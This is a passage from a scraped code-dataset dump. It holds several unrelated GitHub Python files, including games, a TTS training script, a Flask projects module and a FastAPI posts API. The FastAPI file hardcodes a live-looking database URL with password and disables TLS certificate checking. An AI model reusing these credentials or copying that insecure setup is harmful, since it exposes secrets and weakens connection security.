if choice == \"a\" or choice == \"A\":\r\n print(\"Addition\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n add(a, b)\r\n\r\n elif choice == \"b\" or choice == \"B\":\r\n print(\"Subtraction\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n sub(a, b)\r\n \r\n elif choice == \"c\" or choice == \"C\":\r\n print(\"Multiplication\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n mul(a, b)\r\n\r\n elif choice == \"d\" or choice == \"D\":\r\n print(\"Division\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n div(a, b)\r\n\r\n elif choice == \"e\" or choice == \"E\":\r\n print(\"program ended\")\r\n quit()\r\n\r\nimport random\r\n\r\ndef watch():\r\n x = input(\"Do you want to play again (yes/no): \")\r\n if x.lower() != \"yes\":\r\n quit()\r\n\r\nwhile True:\r\n user_guess = input(\"Guess the number between 1 to 20: \")\r\n\r\n if user_guess.isdigit():\r\n user_guess = int(user_guess)\r\n if user_guess < 1 or user_guess > 20:\r\n print(\"Guess a number between 1 and 20\")\r\n else:\r\n computer_guess = random.randint(1, 20)\r\n print(\"The computer guessed:\", computer_guess)\r\n\r\n if user_guess != computer_guess:\r\n print(\"You lost\")\r\n else:\r\n print(\"You won\")\r\n\r\n watch()\r\n else:\r\n print(\"Please type a number next time\")","repo_name":"Noble16-code/webpro","sub_path":"Back end dev.py","file_name":"Back end dev.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19591661799","text":"import bukkitadmin\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\npackages = [\n 'bukkitadmin',\n]\n\nrequires = [\n 'requests_cache>=0.4.4',\n 'pager>=3.3',\n 'argcomplete>=0.8.0',\n 'progressbar>=2.3',\n 'beautifulsoup4>=4.3.2',\n 'feedparser>=5.1.3',\n 'requests>=1.2.3',\n 'pyyaml>=3.10',\n 'pexpect>=2.4',\n]\n\nsetup(\n name = \"bukkitadmin\",\n version = bukkitadmin.__version__,\n packages = packages,\n install_requires=requires,\n zip_safe=False,\n package_dir={'bukkitadmin': 'bukkitadmin'},\n entry_points = {\n 'console_scripts': [\n 'bukkit = bukkitadmin.commands:main'\n ]\n }\n)\n","repo_name":"andrepl/bukkitadmin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6446963208","text":"import random\n\nimport torch\n\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.Tacotron2 import Tacotron2\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.TacotronDataset import TacotronDataset\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.tacotron2_train_loop import train_loop\nfrom Utility.path_to_transcript_dicts import *\n\n\ndef run(gpu_id, resume_checkpoint, finetune, model_dir, resume):\n if gpu_id == \"cpu\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n device = torch.device(\"cpu\")\n\n else:\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n device = torch.device(\"cuda\")\n\n torch.manual_seed(131714)\n random.seed(131714)\n torch.random.manual_seed(131714)\n\n print(\"Preparing\")\n cache_dir_hifitts = os.path.join(\"Corpora\", \"multispeaker_nvidia_hifitts\")\n os.makedirs(cache_dir_hifitts, exist_ok=True)\n\n if model_dir is not None:\n save_dir = model_dir\n else:\n save_dir = os.path.join(\"Models\", \"Tacotron2_MultispeakerEnglish\")\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n train_set = TacotronDataset(build_path_to_transcript_dict_nvidia_hifitts(),\n cache_dir=cache_dir_hifitts,\n lang=\"en\",\n speaker_embedding=True,\n cut_silences=True,\n min_len_in_seconds=3,\n max_len_in_seconds=12,\n device=device)\n\n model = Tacotron2(idim=166, odim=80, spk_embed_dim=960)\n\n print(\"Training model\")\n train_loop(net=model,\n train_dataset=train_set,\n device=device,\n save_directory=save_dir,\n steps=100000,\n batch_size=64,\n epochs_per_save=1,\n use_speaker_embedding=True,\n lang=\"en\",\n lr=0.001,\n path_to_checkpoint=resume_checkpoint,\n fine_tune=finetune,\n resume=resume)\n","repo_name":"leo1129/IMS-Toucan","sub_path":"TrainingInterfaces/TrainingPipelines/Tacotron2_MultiEnglish.py","file_name":"Tacotron2_MultiEnglish.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"6107278157","text":"import rabbitpy\nimport time\nimport random\nimport json\nfrom constants import *\n\ndef publisher():\n connection = rabbitpy.Connection(BROKER_URL) # Connect to RabbitMQ server\n channel = connection.channel() # Create new channel on the connection\n\n # Create a \"topic\" exchange to post sensor data\n exchange = rabbitpy.Exchange(channel, EXCHANGE_ID, exchange_type='topic')\n exchange.declare() # ensure exchange exists on the server\n # can remove using exchange.delete()\n\n time.sleep(5)\n for i in range(100):\n data = {'seq': i, 'id': 'sensor123', 'temp': random.randint(0,50)}\n message = rabbitpy.Message(channel, json.dumps(data)) # serialize data to string\n # Publish the message using a \"routing key\"\n print(f\"publisher: emitting event '{data}'\")\n message.publish(exchange, 'temp.sensor123')\n time.sleep(5)\n\nif __name__ == \"__main__\":\n\tpublisher()","repo_name":"tvcutsem/distributed-systems","sub_path":"indirect_communication/publish_subscribe/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"28406923539","text":"'''\nCreated on 05.08.2016\n\n@author: Jonas\n'''\nimport os, stat\nimport shlex\nimport shutil\nfrom subprocess import Popen, PIPE\n\nfrom son_editor.app.database import db_session, scan_project_dir\nfrom son_editor.app.exceptions import NotFound, NameConflict\nfrom son_editor.impl import gitimpl\nfrom son_editor.models.project import Project\nfrom son_editor.models.workspace import Workspace\nfrom son_editor.util.descriptorutil import sync_project_descriptor\nfrom son_editor.util.requestutil import get_config, rreplace\n\nWORKSPACES_DIR = os.path.expanduser(get_config()[\"workspaces-location\"])\n# make ws paths prettier\nWORKSPACES_DIR = os.path.normpath(WORKSPACES_DIR)\n\n\ndef get_projects(ws_id: int) -> list:\n \"\"\"\n Get a list of projects in this workspace\n\n :param ws_id: The workspace ID\n :return: List of all projects\n \"\"\"\n session = db_session()\n projects = session.query(Project). \\\n join(Workspace). \\\n filter(Workspace.id == ws_id).all()\n session.commit()\n return list(map(lambda x: x.as_dict(), projects))\n\n\ndef get_project(ws_id, pj_id):\n \"\"\"\n Get a specific project \n :param ws_id: The workspace ID\n :param pj_id: The project ID\n :return: The project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project). \\\n join(Workspace). \\\n filter(Workspace.id == ws_id). \\\n filter(Project.id == pj_id). \\\n first()\n session.commit()\n if project:\n return project.as_dict()\n else:\n raise NotFound(\"No project with id {} could be found\".format(pj_id))\n\n\ndef create_project(ws_id: int, project_data: dict) -> dict:\n \"\"\"\n Create a new Project in this workspace\n\n :param ws_id: The workpace ID\n :param project_data: The project data to create\n :return: The new project descriptor as a dict\n \"\"\"\n project_name = shlex.quote(project_data[\"name\"])\n repo = None\n if \"repo\" in project_data:\n repo = project_data[\"repo\"]\n\n if repo:\n return gitimpl.clone(ws_id, repo, project_name)\n\n session = db_session()\n\n # test if ws Name exists in database\n\n workspace = session.query(Workspace). \\\n filter(Workspace.id == ws_id).first()\n if workspace is None:\n raise NotFound(\"No workspace with id {} was found\".format(ws_id))\n\n existing_projects = list(session.query(Project)\n .filter(Project.workspace == workspace)\n .filter(Project.name == project_name))\n if len(existing_projects) > 0:\n raise NameConflict(\"Project with name '{}' already exists in this workspace\".format(project_name))\n\n # prepare db insert\n try:\n project = Project(name=project_name, rel_path=project_name, workspace=workspace)\n set_data(project, project_data)\n\n session.add(project)\n except:\n session.rollback()\n raise\n # create workspace on disk\n proc = Popen(['son-workspace',\n '--workspace', workspace.path,\n '--project', get_project_path(workspace.path, project_name)],\n stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n\n if err.decode().find('exists') >= 0:\n project_exists = True\n else:\n project_exists = False\n\n if exitcode == 0 and not project_exists:\n sync_project_descriptor(project)\n session.commit()\n scan_project_dir(get_project_path(workspace.path, project_name), project)\n return project.as_dict()\n else:\n session.rollback()\n if project_exists:\n raise NameConflict(\"Project with name '{}' already exists in this workspace\".format(project_name))\n raise Exception(err.decode(), out.decode())\n\n\ndef update_project(project_data, project_id):\n \"\"\"\n Update the Project\n\n :param project_data: The project Data\n :param project_id: The project ID to update\n :return: The updated project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project).filter(Project.id == project_id).first()\n if project is None:\n raise NotFound(\"Project with id {} could not be found\".format(project_id))\n\n # Update name\n if 'name' in project_data and project_data['name'] != project.name:\n if os.path.exists(get_project_path(project.workspace.path, project.rel_path)):\n new_name = shlex.quote(project_data['name'])\n old_path = get_project_path(project.workspace.path, project.rel_path)\n new_path = rreplace(old_path, project.name, new_name, 1)\n\n if os.path.exists(new_path):\n raise NameConflict(\"Invalid name parameter, workspace '{}' already exists\".format(new_name))\n\n # Do not allow move directories outside of the workspaces_dir\n if not new_path.startswith(WORKSPACES_DIR):\n raise Exception(\"Invalid path parameter, you are not allowed to break out of {}\".format(WORKSPACES_DIR))\n else:\n # Move the directory\n shutil.move(old_path, new_path)\n project.name = new_name\n project.rel_path = new_name\n set_data(project, project_data)\n sync_project_descriptor(project)\n db_session.commit()\n return project.as_dict()\n\n\ndef set_data(project: Project, project_data: dict) -> None:\n \"\"\"\n Extracts the data from the dictionary and sets it on the database model\n\n :param project: The project database model\n :param project_data: The project data dictionary from the frontend\n \"\"\"\n if \"description\" in project_data:\n project.description = project_data['description']\n if \"maintainer\" in project_data:\n project.maintainer = project_data['maintainer']\n if \"publish_to\" in project_data:\n project.publish_to = \",\".join(project_data['publish_to'])\n if \"vendor\" in project_data:\n project.vendor = project_data['vendor']\n if \"version\" in project_data:\n project.version = project_data['version']\n\n\ndef on_rm_error(func, path, exc_info):\n \"\"\"Gets called if rm_tree gets an error, happens\n especially if trying to remove .git files on windows\"\"\"\n # path contains the path of the file that couldn't be removed\n # let's just assume that it's read-only and unlink it.\n os.chmod(path, stat.S_IWRITE)\n os.unlink(path)\n\n\ndef delete_project(project_id: int) -> dict:\n \"\"\"\n Deletes the project from the database and from the Disk\n\n :param project_id: The id of the project to be deleted\n :return: The deleted project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project).filter(Project.id == int(project_id)).first()\n if project:\n path = get_project_path(project.workspace.path, project.rel_path)\n\n shutil.rmtree(path, onerror=on_rm_error)\n session.delete(project)\n db_session.commit()\n if project:\n return project.as_dict()\n else:\n raise NotFound(\"Project with id {} was not found\".format(project_id))\n\n\ndef get_project_path(workspace_path: str, rel_path: str) -> str:\n \"\"\"\n Helper method to resolve the project path on disk for the given project\n\n :param workspace_path: the path to the workspace\n :param rel_path: the relative path of the project\n :return: The absolute project path\n \"\"\"\n return os.path.join(workspace_path, \"projects\", rel_path)\n","repo_name":"CN-UPB/upb-son-editor-backend","sub_path":"src/son_editor/impl/projectsimpl.py","file_name":"projectsimpl.py","file_ext":"py","file_size_in_byte":7383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"74067500689","text":"import dash_html_components as html\nfrom dash_html_components import Strong, Em\nimport json\n\ndef dict_to_collapsible(input_object):\n content_list = []\n if isinstance(input_object,list):\n for item in input_object:\n content_list.append(extract_layer(item))\n elif isinstance(input_object,dict):\n return extract_layer(input_object)\n else:\n try:\n string_value = str(input_object)\n except:\n string_value = \"!ERROR! - Non-dict object could not become String\" +\\\n \" - Type = {}\".format(type(input_object))\n content_list = [html.P(string_value)]\n\n html_div = html.Div(content_list)\n return html_div\n\n\ndef extract_layer(input_object,indents=0):\n indent_text = str(2*indents) + \"em\"\n open_on_default = True\n\n if isinstance(input_object,list):\n # Transform to dict and then continue\n input_object = dict(enumerate(input_object))\n open_on_default = False\n\n if isinstance(input_object,dict):\n content_list = []\n for key,value in input_object.items():\n if isinstance(value,dict) or isinstance(value,list):\n content_list.append(\n html.Details([\n html.Summary(Em(Strong(str(key)))),\n extract_layer(value,indents+1)\n ],open=open_on_default)\n )\n else:\n try:\n string_value = [Strong(str(key)),\": {}\".format(value)]\n except:\n string_value = \"!ERROR! - Non-dict object could not \" +\\\n \"become String - Type = {}\".format(type(input_object))\n\n content_list.append( html.P(string_value) )\n else:\n # ERROR: Something has gone wrong here. Only Dicts/lists should be passed\n # to this file.\n content_list = [html.P(\"!Error! Not list or dict: {}\".format(\\\n type(input_object)))]\n\n html_div = html.Div(content_list,style={'text-indent':indent_text})\n return html_div\n\ntest_dict = {\n \"outer_layer1\": {\n \"middle_layer1.1\": {\n \"inner_layer1.1.1\": \"inner_value1.1.1\",\n \"inner_layer1.1.2\": \"inner_value1.1.2\"\n },\n \"middle_layer1.2\": \"middle_value1.2\",\n \"middle_layer1.3\": [\n \"list_value1\",\n \"list_value2\",\n \"list_value3\",\n {\n \"dict_in_list1\": \"value1.3.1\",\n \"dict_in_list2\": {\n \"some_key\": \"help\"\n }\n }\n ]\n }\n}\n\n################################################################################\n\nif __name__ == \"__main__\":\n print(extract_layer(test_dict))\n","repo_name":"elliott-fogg/lco_schedule_visualiser","sub_path":"collapsible.py","file_name":"collapsible.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24805807093","text":"#!/usr/bin/python\n# Strings 2.1.opt O(s)\n# defaultdict builds a dictionary (in this case) where the key is the char in the string and the val is an int.\n\nfrom collections import defaultdict\n\ndef del_if_zero(dict, char): #\n\tif dict[char] == 0:\n\t\tdel dict[char]\n\ndef anagram_indices(word, s):\n\tresult = []\n\n\tfreq = defaultdict(int)\n\tfor char in word: \n\t\tfreq[char] += 1\n\t\t#print(\"freq = \", freq) # freq = {'a':1, 'b':1}\n\n\tfor char in s[:len(word)]: # for char in s[:2]\n\t\tfreq[char] -= 1\n\t\tdel_if_zero(freq, char)\n\t\t#print('freq after del_if_zero', freq) # freq = {}\n\n\tif not freq: # if the 2 above for loops produce nothing then the first characters of the string are ana anagram\n\t\t\t\t# The first index (0) is appended to result\n\t\tresult.append(0)\n\n\tfor i in range(len(word), len(s)): # for i in range(2, 6) - does the same as above but starts after len(word)\n\t\tstart_char, end_char = s[i - len(word)], s[i] # start_char is 'a' (2 - 2) end_char is 'x' (word window vars)\n\t\tprint('i = ', i)\n\t\t#print('len(word = ', len(word))\n\t\tprint('start_char = ', start_char)\n\t\tprint('end_char = ', end_char)\n\t\tfreq[start_char] += 1\n\t\tprint('freq 2 build up', freq)\n\t\tdel_if_zero(freq, start_char)\n\t\tprint('freq after del_if', freq)\n\n\t\tfreq[end_char] -= 1\n\t\tdel_if_zero(freq, end_char)\n\n\t\tif not freq:\n\t\t\tbeginning_index = i - len(word) + 1\n\t\t\tresult.append(beginning_index)\n\tprint(result)\n\treturn result\n\nif __name__ == \"__main__\":\n\tg = anagram_indices('ab', 'abxaba')\n\tprint(g)\n\n","repo_name":"anovacap/daily_coding_problem","sub_path":"is_anagram_opt.py","file_name":"is_anagram_opt.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70020200531","text":"#Import modules\nimport random\nimport curses\n\n#Initialize the curses library to create our screen\nscreen = curses.initscr()\n\n#Hide the mouse cursor\ncurses.curs_set(0)\n\n#Getmax screen height and width\nscreen_height, screen_width = screen.getmaxyx()\n\n#Create a new window for the game\nwindow = curses.newwin(screen_height, screen_width, 0, 0)\n\n#Allow window to receive input from the keyboard\nwindow.keypad(1) # == Accept input for the keyboard\n\n#Set the delay for updating the screen\nwindow.timeout(200) #100ms\n\n#Set the x,y coordinates of the initial position of snake's head\nsnk_x = screen_width // 4\nsnk_y = screen_height // 2\n\n#Define the initial position of the snake body\nsnake = [[snk_y, snk_x], [snk_y, snk_x - 1], [snk_y, snk_x - 2]]\n\n#Create the food in the middle of window\nfood = [screen_height // 2, screen_width // 2]\n\n#Add the food by using PI character from curses module\nwindow.addch(food[0], food[1], curses.ACS_DIAMOND)\n\n#Set initial movement direction to right\nkey = curses.KEY_RIGHT\n\n#Create game loop that loops forever until player loses or quits\n##THE MAIN GAME LOOP\nwhile True:\n\n #get the next key that will be pressed by user\n next_key = window.getch()\n\n #If user doesn't input anything, key remains same, else key will be set to time new pressed key\n key = key if next_key == -1 else next_key #-1 means the user didn't enter anything.\n\n #Check if snake collided with the walls or itself\n #If it collides, close the window & exit program\n if snake[0][0] in [0, screen_height] or snake[0][1] in [\n 0, screen_width\n ] or snake[0] in snake[1:]:\n curses.endwin() #closing the window\n quit() #exit the program\n\n #Set the new position of the snake head based on the direction\n new_head = [snake[0][0], snake[0][1]]\n if key == curses.KEY_DOWN:\n new_head[0] += 1\n if key == curses.KEY_UP:\n new_head[0] -= 1\n if key == curses.KEY_RIGHT:\n new_head[1] += 1\n if key == curses.KEY_LEFT:\n new_head[1] -= 1\n\n #Insert the new head to the first position of snake list\n snake.insert(0, new_head)\n\n #Check if snake ate the food\n if snake[0] == food:\n\n #Remove food if snake at it\n food = None\n #While food is removed, generate new food in a random place on screen with\n while food is None:\n new_food = [\n random.randint(1, screen_height - 1),\n random.randint(1, screen_width - 1)\n ]\n #Set the food to new food if new food generated is not in snake body and add it to screen\n\n food = new_food if new_food not in snake else None\n window.addch(food[0], food[1], curses.ACS_DIAMOND)\n\n #Otherwise, remove the last segment of snake body (If snake didn't eat the food)\n else:\n tail = snake.pop()\n window.addch(tail[0], tail[1], ' ')\n\n #Update the position of the snake on the screen\n window.addch(snake[0][0], snake[0][1], curses.ACS_CKBOARD)\n","repo_name":"NourSoltani/SnakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28411596069","text":"import logging\nimport os\nimport sys\nimport zipfile\n\nimport wget\n\nlogger = logging.getLogger('sirendownloadlogging')\n\n# Définition du logging level\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler(stream=sys.stdout)\nlogger.addHandler(handler)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef download_file_sirene(path_root, filename_sirene):\n \"\"\"download associated file \n \"\"\"\n try:\n # download zip file\n url = f'https://files.data.gouv.fr/insee-sirene/Stock{filename_sirene}_utf8.zip'\n filename_zip = f'Stock{filename_sirene}_utf8.zip'\n filename_csv = f'Stock{filename_sirene}_utf8.csv'\n wget.download(url, os.path.join(path_root, filename_zip))\n\n # extract csv file\n with zipfile.ZipFile(os.path.join(path_root, filename_zip), 'r') as zip:\n zip.extract(filename_csv, path_root)\n os.remove(os.path.join(path_root, filename_zip))\n\n except Exception as e:\n logging.error('Récupération de la base siren : %s', str(e))\n","repo_name":"r-jaylet/OpenDataWrangler","sub_path":"utils/utils_sirene.py","file_name":"utils_sirene.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35117860221","text":"import db.query_db as db\n\n\nclass AnswerQuestion:\n id:int\n answer_id:int\n question_id:int\n\n def __init__(self, **kwargs):\n self.id = kwargs['id']\n self.answer_id = kwargs['answer_id']\n self.question_id = kwargs['question_id']\n\n\n\ndef add_answer_question(answer_id, question_id):\n try:\n max_id = get_max_id() + 1\n print(answer_id, question_id)\n db.query=f\"\"\"insert into AnswerQuestion (id, AnswerId, QuestionId)\n values ({max_id}, {answer_id}, {question_id})\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n return max_id\n except Exception as exc:\n print(exc)\n return False\n\n\ndef get_answer_question_by_vote_answer_id(vote_answer_id):\n try:\n db.query = f\"\"\"select * \n from AnswerQuestion\n where AnswerId = {vote_answer_id}\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n answer_questions = []\n for row in result[0].rows:\n answer_question = AnswerQuestion(id= row.id, answer_id=row.AnswerId, question_id=row.QuestionId)\n answer_questions.append(answer_question)\n return answer_questions\n except Exception as exp:\n print(exp)\n return False\n\ndef get_max_id():\n db.query = f\"\"\"select max(id) as id from AnswerQuestion\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n if result[0].rows[0].id == None:\n return 0\n return result[0].rows[0].id","repo_name":"DimaHovrov/KuratorBot","sub_path":"model/VoteModels/AnswerQuestion.py","file_name":"AnswerQuestion.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25998862511","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nlongest_valid_parentheses.py\n\nCreated by Shengwei on 2014-07-08.\n\"\"\"\n\n# https://oj.leetcode.com/problems/longest-valid-parentheses/\n# tags: medium / hard, array, parentheses, stack, longest\n\n\"\"\"\nGiven a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\nFor \"(()\", the longest valid parentheses substring is \"()\", which has length = 2.\n\nAnother example is \")()())\", where the longest valid parentheses substring is \"()()\", which has length = 4.\n\"\"\"\n\n# alternative: D&C\n\nclass Solution:\n # @param s, a string\n # @return an integer\n def longestValidParentheses(self, s):\n stack = []\n \n # for '(' at given index, store the length of matching pair ')';\n # the last one length[len(s)] is a sentinel\n lengths = [0] * (len(s) + 1)\n \n for i in xrange(len(s)):\n if s[i] == '(':\n stack.append(i)\n if s[i] == ')':\n if stack:\n left_index = stack.pop()\n lengths[left_index] = i + 1 - left_index\n \n max_length = current_length = i = 0\n while i < len(s):\n current_length = lengths[i]\n \n # for the last pair, i + current_length == len(s), and\n # it takes advantage of the sentinel\n while lengths[i + current_length] > 0:\n current_length += lengths[i + current_length]\n \n max_length = max(max_length, current_length)\n i += current_length + 1\n \n return max_length\n","repo_name":"CodingVault/LeetCodeInPython","sub_path":"longest_valid_parentheses.py","file_name":"longest_valid_parentheses.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"66"} +{"seq_id":"3331666135","text":"from django.urls import path\nfrom .views import (index,\n register,\n user_login,\n user_logout,\n profile,\n search_user,\n profile_update,\n password_change,\n friend_list,\n friend_requests_list,)\n\nfrom .apis import (FriendList,\n SendFriendRequest,\n UserSearchList,\n CancelFriendRequest,\n AcceptFriendRequest,\n DeclineFriendRequest,\n RemoveFriend,\n CreatePost,\n UserPostList,\n UserDetail)\n\nurlpatterns = [\n # views\n path('', index, name='index'),\n path('register/', register, name='register'),\n path('login/', user_login, name='login'),\n path('logout/', user_logout, name='logout'),\n path('search/', search_user, name='search'),\n path('user//', profile, name='profile'),\n path('user//friends/', friend_list, name='friend_list'),\n path('account/password_change/', password_change, name='password_change'),\n path('account/update/', profile_update, name='profile_update'),\n path('account/friend_requests/', friend_requests_list, name='friend_requests'),\n\n # apis\n path('api/friend_request/', SendFriendRequest.as_view(),\n name='send_friend_request'),\n path('api/friend_request_cancel', CancelFriendRequest.as_view(),\n name='cancel_friend_request'),\n path('api/friend_request_accept/', AcceptFriendRequest.as_view(),\n name='accept_friend_request'),\n path('api/friend_request_decline/', DeclineFriendRequest.as_view(),\n name='decline_friend_request'),\n path('api/friend_remove/', RemoveFriend.as_view(), name='remove_friend'),\n path('api/post/create/', CreatePost.as_view(), name='create_post'),\n path('api/user//posts/',\n UserPostList.as_view(), name='user_posts'),\n\n ###### NOT USED #########\n path('api/user//friends/',\n FriendList.as_view(), name='friend_list_api'),\n path('api/user//', UserDetail.as_view(), name='user_detail'),\n path('api/search/', UserSearchList.as_view(), name='user_search_list'),\n]\n","repo_name":"sinhaugoh/FriendZone","sub_path":"social_media/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33388860105","text":"import os\nimport random\n\nif True:\n music_folder = 'C:\\\\Users\\\\Hunter\\\\Music'\n music = ['Eminem_-_Kamikaze_(Lyrics)','01-Linkin_Park-Wake','02-Linkin_Park-Given_Up']\n random_music = music_folder + random.choice(music) + '.mp3'\n os.system('')\n print(\"enjoy music\")\n\nelse:\n print(\"not play music\")\n\n","repo_name":"MyHackInfo/My-Project","sub_path":"Play Songs.py","file_name":"Play Songs.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29954044758","text":"from typing import List\nimport databases\nimport sqlalchemy\nfrom fastapi import FastAPI, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\nimport os\nimport urllib\nfrom dotenv import load_dotenv\nload_dotenv()\nimport ssl\nfrom datetime import datetime\nimport time\n\nctx = ssl.create_default_context(cafile='')\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nhost_server = os.environ.get('host_server')\ndb_server_port = urllib.parse.quote_plus(str(os.environ.get('db_server_port')))\ndatabase_name = os.environ.get('database_name')\ndb_username = urllib.parse.quote_plus(str(os.environ.get('db_username')))\ndb_password = urllib.parse.quote_plus(str(os.environ.get('db_password')))\nssl_mode = urllib.parse.quote_plus(str(os.environ.get('ssl_mode')))\n# DATABASE_URL = 'postgresql://{}:{}@{}:{}/{}?sslmode={}'.format(db_username, db_password, host_server, db_server_port, database_name, ssl_mode)\nDATABASE_URL = 'postgres://hquasadanjovxm:74cbc8adaa3db997056839dea9ba9cf88f1ea76b946c1ff2e45bffc39f182946@ec2-18-211-171-122.compute-1.amazonaws.com:5432/de96010mpiergn?sslmode=disable'\n\ndatabase = databases.Database(DATABASE_URL, ssl=ctx)\n\nmetadata = sqlalchemy.MetaData()\n\nnotes = sqlalchemy.Table(\n \"postdemo\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column(\"uuid\", sqlalchemy.String),\n sqlalchemy.Column(\"description\", sqlalchemy.String),\n sqlalchemy.Column('username', sqlalchemy.String(16), nullable=False),\n sqlalchemy.Column('imageurl', sqlalchemy.String()),\n sqlalchemy.Column(\"nlike\", sqlalchemy.Integer),\n sqlalchemy.Column(\"ncomment\", sqlalchemy.Integer),\n sqlalchemy.Column(\"commentid\", sqlalchemy.String),\n sqlalchemy.Column(\"datetimenow\", sqlalchemy.String),\n)\n\nengine = sqlalchemy.create_engine(\n 'postgres://hquasadanjovxm:74cbc8adaa3db997056839dea9ba9cf88f1ea76b946c1ff2e45bffc39f182946@ec2-18-211-171-122.compute-1.amazonaws.com:5432/de96010mpiergn', pool_size=3, max_overflow=0,\n)\nmetadata.create_all(engine)\n\n\n\nclass Post(BaseModel):\n id: int\n uuid: str\n description: str\n username: str\n imageurl: str\n nlike: int\n ncomment: int\n commentid: str\n datetimenow: str\n\n\nclass PostIn(BaseModel):\n uuid: str\n description: str\n username: str\n imageurl: str\n nlike: int\n ncomment: int\n commentid: str\n\n\n \n\n\napp = FastAPI(title=\"REST API using FastAPI PostgreSQL Async EndPoints\")\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n\n@app.get(\"/\")\nasync def read_main():\n return {\"msg\": \"yes\"}\n\n@app.get(\"/posts/\", response_model=List[Post], status_code = status.HTTP_200_OK)\nasync def read_notes(page_no: int = 0):\n query = notes.select().offset(page_no*10).limit(10)\n return await database.fetch_all(query)\n\n\n@app.post(\"/posts/\", response_model=PostIn, status_code = status.HTTP_201_CREATED)\nasync def create_note(note: PostIn):\n query = notes.insert().values(\n uuid=note.uuid,\n description=note.description,\n username=note.username,\n imageurl=note.imageurl,\n nlike=note.nlike,\n ncomment=note.ncomment,\n commentid=note.commentid,\n datetimenow=str(time.time()),\n )\n last_record_id = await database.execute(query)\n return {**note.dict(), \"id\": last_record_id}\n\n\n# @app.get(\"/notes/{note_id}/\", response_model=Note, status_code = status.HTTP_200_OK)\n# async def read_notes(note_id: int):\n# query = notes.select().where(notes.c.id == note_id)\n# return await database.fetch_one(query)\n\n\n# @app.put(\"/notes/{note_id}/\", response_model=Note, status_code = status.HTTP_200_OK)\n# async def update_note(note_id: int, payload: NoteIn):\n# query = notes.update().where(notes.c.id == note_id).values(text=payload.text, completed=payload.completed)\n# await database.execute(query)\n# return {**payload.dict(), \"id\": note_id}\n\n# @app.delete(\"/notes/{note_id}/\", status_code = status.HTTP_200_OK)\n# async def delete_note(note_id: int):\n# query = notes.delete().where(notes.c.id == note_id)\n# await database.execute(query)\n# return {\"message\": \"Note with id: {} deleted successfully!\".format(note_id)}\n\n ","repo_name":"amantiwari1/fastapi_postrgeSql","sub_path":"postapi.py","file_name":"postapi.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"20064475035","text":"def add(a, b):\n a += b\n return a\n\nclass Company:\n def __init__(self, name, 